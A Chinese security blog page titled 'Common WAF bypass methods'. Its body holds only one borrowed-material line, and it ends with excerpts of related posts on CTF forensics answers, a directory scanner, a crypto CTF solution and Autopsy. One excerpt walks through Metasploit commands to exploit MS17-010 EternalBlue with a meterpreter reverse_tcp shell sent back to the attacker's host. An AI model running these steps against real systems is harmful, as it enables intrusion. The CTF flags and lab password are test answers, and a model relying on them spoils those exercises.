WAF的常见绕过方法
发表于|更新于
|浏览量:
1 | 这个是网上看到的二向箔WAF资料,感觉挺好的,借鉴一下 |

















文章作者: Benben Dan
文章链接: http://47.97.97.224/2025/05/07/WAF%E7%9A%84%E5%B8%B8%E8%A7%81%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 BenD!
相关推荐

2026-01-20
流量分析和Windows应急响应的部分原创题(含附件)
1.misc,先给一个压缩包伪装加密,然后提供一个图片,图片使用zsteg隐写提示文件分离的压缩包解压密码,然后解压出doro.doc,rodo.doc中藏一个图片,图片下方放入flag 解压密码:GIF_LSB_Ezflag 最终flag{Ctts_get_the_flag!!} 2.使用Windows搭建一个网站,进行应急响应 开机密码:xiaochen112233 2.流量分析应急响应—流量分析 1.hack的IP地址作为flag提交 flag{192.168.20.137} 2.hack访问的端口有哪些?从小到大排序提交,flag{xx,xx,xx,xx} flag{80,433} 3,hack找到的第一个可注入网页名称是什么? flag{shell.php} 4.hack上传的木马文件名称是什么? flag{1233.php} 5.hack的木马key是什么? flag{cmd} 6.靶机的系统版本是多少?hint:只需要写版本号即可 flag{6.1.7601} 7.hack执行的第一个命令是什么? flag{dir} 8.hack获取的开机密码是多少? flag{x...

2026-02-06
专业网址目录扫描工具用户手册
项目地址:https://github.com/benbenbendang/WebScan-Pro WebScan Pro - 专业网址目录扫描工具用户手册1. 工具概述与价值主张WebScan Pro 是一款专为安全研究人员和渗透测试工程师设计的高性能网站目录扫描工具。它采用模块化架构设计,结合了强大的多线程扫描引擎与直观的图形用户界面(GUI),旨在帮助用户快速、准确地发现目标网站的隐藏资源、未授权访问接口及敏感文件。 核心价值 高效发现:基于连接池技术的多线程并发扫描,大幅提升扫描速度。 灵活易用:同时提供专业的命令行(CLI)模式和现代化的图形界面(GUI),满足不同场景需求。 智能监控:实时可视化展示扫描进度、状态码分布及网络响应情况。 国际化支持:内置中英文双语界面,一键切换,打破语言障碍。 2. 系统要求与安装部署步骤2.1 系统环境要求 操作系统:Windows 10/11, macOS, Linux (Ubuntu/CentOS等) 运行环境:Python 3.6 及以上版本 依赖库:PyQt6, requests, rich, col...

2025-05-17
第二届“Parloo”CTF应急响应挑战赛-学生组(CTF)
title: 第二届Parloo杯CTF应急响应挑战赛date: 2025-05-18 13:23:32categories: 网络安全tags: ctf 网络安全 应急响应 密码学 python banner_img: /img/df0fd0ee5e9bd441452f544d6a3b6250.png banner_img_height: 84 banner_mask_alpha: 0.3 Crypto循环锁链12311 0D 19 0E 12 2A 74 42 31 2B 25 00 07 0C 16 3927 21 03 00 28 0D 27 20 26 2C 19 00 0C 3B 04 3922 19 52 44 0D 还原思路简述 加密逻辑猜测 题面提示“每个字节被锁在一个无尽的循环中”,很像典型的环形 XOR: 1c[i] = p[i] ⊕ p[(i+1) mod N] (0 ≤ i < N) 其中 p 为明文,c 为给出的 37 字节密文。 利用已知前缀定位“起点” 已知 flag 以 1pal...

2026-01-02
MSF获取Windows的shell后
扫描器的使用use auxiliary/scanner/smb/smb_ms17_010 攻击模块的使用下一步操作:发起攻击 (Exploit) 既然扫描器已经告诉你目标是“易受攻击”的,你现在的动作应该是从 辅助模块(Scanner) 切换到 攻击模块(Exploit)。 请按照以下顺序输入命令: 切换模块: Bash 1use exploit/windows/smb/ms17_010_eternalblue 设置目标 IP: Bash 1set RHOSTS 192.168.20.135 设置攻击载荷(通常默认就是这个,但建议检查一下): Bash 1set PAYLOAD windows/x64/meterpreter/reverse_tcp 设置你自己的 IP(Kali 的 IP,用于接收反弹回来的 Shell): Bash 12# 先在另一个终端用 ip addr 确认你的网卡 IPset LHOST [你的Kali的IP] 开火攻击: Bash 1exploit 进入Windows之后的操作 1. 基础环境与权限感知在任何操作...

2025-05-18
第二届“Parloo”CTF应急响应挑战赛-学生组(应急响应)

2026-01-31
Autopsy的使用方法
Autopsy的使用方法kali中使用方法 先在终端中启动这个程序,然后会生成一个9999端口的网站,直接点击访问 点击New Case 创建案例 因为原本是英文的,所以直接翻译了,然后这个地方案件名称、描述,调查员姓名(只填a即可)都可以随便填,看你自己, 中译一下,方便查看,直接Add Host添加主机 1. 核心设置项 Host Name(主机名): 必填项。给这台设备起个名字,比如 host1 或 target_pc。只能包含字母、数字和符号。 Description(描述): 选填。简单备注一下这台设备是什么,例如“嫌疑人的办公电脑”。 2. 时间与同步设置(对取证非常重要) Time zone(时区): 选填。如果你知道原设备所在的时区,可以在这里设置(例如 GMT+8)。这能确保你后续在 Timeline(时间线) 分析中看到的是准确的当地时间。 Timeskew Adjustment(时间偏移调整): 选填。如果原设备的系统时间比准确时间快了或慢了,你可以在这里输入秒数进行补偿(例如快了 10 秒,就填 -10)。 3. 进阶数据库(做 CTF 或常...
公告
愿诸位道友心境,四季如春
